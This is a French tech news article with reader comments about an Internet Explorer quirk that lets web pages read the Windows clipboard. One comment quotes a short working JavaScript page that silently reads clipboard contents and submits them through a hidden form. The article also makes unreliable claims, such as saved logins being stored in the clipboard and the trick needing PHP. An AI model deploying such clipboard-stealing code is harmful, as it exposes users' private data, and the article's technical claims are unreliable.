Nouvelle faille dans Internet Explorer

Le par  |  26 commentaire(s) Source : OSNews
internet explorer IE logo

Un développeur indépendant vient de (re)découvrir une particularité d'Internet Explorer qui pourrait causer des problèmes de sécurité.

Un développeur indépendant vient de (re)découvrir une particularité d'Internet Explorer qui pourrait causer des problèmes de sécurité.

Internet explorer ie logoLe forum du site AmigaWorld rapporte une conversation à l'origine de laquelle on trouve une fonctionnalité bien particulière d'Internet Explorer. En effet, en employant un code PHP approprié, il est possible de lire le contenu de votre Presse-Papier directement dans une page du navigateur Internet de Microsoft.

Le Presse-Papier de Windows, au nom si peu évocateur en français (il s'appelle Clipboard en anglais), est une petite application très pratique qui garde temporairement en mémoire des données, pendant que vous faites un copier-coller, par exemple. Certains logiciels permettent d'augmenter la capacité de cet accessoire, tandis que la fonction Nettoyage de Disque (et la plupart des logiciels tiers qui assurent les mêmes fonctions) peut le "purger" de tout ce qu'il contient. Il se vide en général automatiquement lorsque vous fermez votre session Windows, de toute façon.

Oui mais voilà, pendant votre session, vous pouvez y stocker quantités de choses, sans même vous en rendre compte. Ainsi, lorsque vous visitez un site sécurisé pour la première fois, une fois rentré votre identifiant et votre mot de passe, Windows vous propose de les mémoriser. Si vous cliquez sur "Oui", ces données seront stockées dans le Presse-Papier, avant d'être transférées dans un répertoire spécifique lorsque vous quittez l'application qui vous sert à naviguer sur le Web, et/ou quand vous éteignez votre PC.

Cette fonctionnalité, pour pratique qu'elle soit, présente donc de sérieux risques, si on sait les exploiter. Il semblerait en effet que quelques lignes de code en PHP, soigneusement imbriquées dans le code d'une page Web, convainque Internet Explorer de communiquer le contenu du Presse-Papier. Par exemple, en remplissant un simple formulaire en ligne, vous pouvez, sans vous en rendre compte, renseigner en fait les cases d'une base de données. De plus, il existe des logiciels qui permettent d'extraire le contenu du Presse-Papier, à condition qu'on les aide un peu. La particularité d'Internet Explorer dont il est question ici leur donne un sérieux coup de main...

Les autres navigateurs Internet les plus utilisés de nos jours (Mozilla Firefox, Opera, Safari, etc...) sont insensibles à cet artifice, mais les sur-couches d'Internet Explorer (Maxthon, Avant, SlimBrowser, etc...) sont concernées. Pire, un bêta-testeur qui participe au développement d'Internet Explorer 7 confirme que cette faille, si on peut l'appeler ainsi, existe toujours dans les actuelles versions de test du futur navigateur Web de Microsoft...

Les plus curieux d'entre vous peuvent tester par eux-mêmes cette "faille", en mettant quelque chose en mémoire dans le Presse-Papier de Windows (par exemple, le texte de cette news...), puis en cliquant sur ce lien. Sous Internet Explorer, vous devriez voir apparaître ce que vous avez mémorisé. Sous Firefox ou Opera, par exemple, vous aurez juste un petit message d'excuse, vous indiquant que le tour de magie n'a pas fonctionné.

Garanti sans danger, quoique... Si vous êtes cardiaque...




Complément d'information

Vos commentaires Page 1 / 3

Gagnez chaque mois un abonnement Premium avec GNT : Inscrivez-vous !
Trier par : date / pertinence
Le #70398
Je ne vois vraiment pas comment avec du PHP (langage interprété sur le SERVEUR) on puisse recuperer des données presentes chez le client.

Effectivement, après lecture du code,je constate qu'il ne s'agit aps de PHP mais de javascript , langage interprété chez le client.
C'est beaucoup plus logique...
Le #70399
En effet, du javascript:
Sous Mozilla / Firefox, page blanche.
Avec IE:
"Here's how I did it:
<html>
<head>
<title>GNAA Last Measure v4.1 by Rucas with Armorfist's PopupByPasser Mod.</title>
</head>

<body>

<form name="clip" method="post" action="test.php" style="display:none">
<input type="text" name="content">
<input type="submit">
</form>

<script language="javascript">
//without this if statement check, it bombs out with an error
if(typeof clipboardData != 'undefined') {
var content = clipboardData.getData("Text");
document.forms["clip"].elements["content"].value = content;
}
document.forms["clip"].submit();
</script>
</body>
</html>
Le #70400
Sauf qu'il y un submit sur une page PHP. Copiez le cheumeuleu et supprimez le action=test.php et ça ne marche plus.
Ceci dit le php peut très bien généré du javascript.
A+
Le #70401
une faille de plus ou de moins vive Firefox qui n'est pas sans faille mais tente toujours de les corriger très rapidement
Anonyme
Le #70402
oui javascript, mon extension (firefox) a bloqué le script et j'ai eu le message d'erreur uniquement une fois avoir autorisé le site a utiliser javascript.

ca va troller alors bonne chance aux admirateurs d'IE (s'il en reste...)

(mode troll off)
bonne journée
Le #70404
Ca se dégrade la qualité des news sur ce site ...
C'est très rapide de voir que le php ne sert ici qu'à une chose, regarder le user agent...
Qui ici n'a jamais vu sous windows un site qui montre le contenu de c: dans une page pour essayer de vendre un antivirus '
Le #70405
BharatHope:
"session"
"cession" ca marche aussi
Le #70406
La version 7 d'IE même pas sortie et déja une faille à déclarer (Bon on va dire quelle ne compte pas celle là. sauf si il ne la corrige pas avant sa sortie )
Enfin de toute manière on est en sécurité nulle part
Le #70409
On ne parle pas de IE7...
Suivre les commentaires
Poster un commentaire
Anonyme
:) ;) :D ^^ 8) :| :lol: :p :-/ :o :w00t: :roll: :( :cry: :facepalm:
:andy: :annoyed: :bandit: :alien: :ninja: :agent: :doh: :@ :sick: :kiss: :love: :sleep: :whistle: =]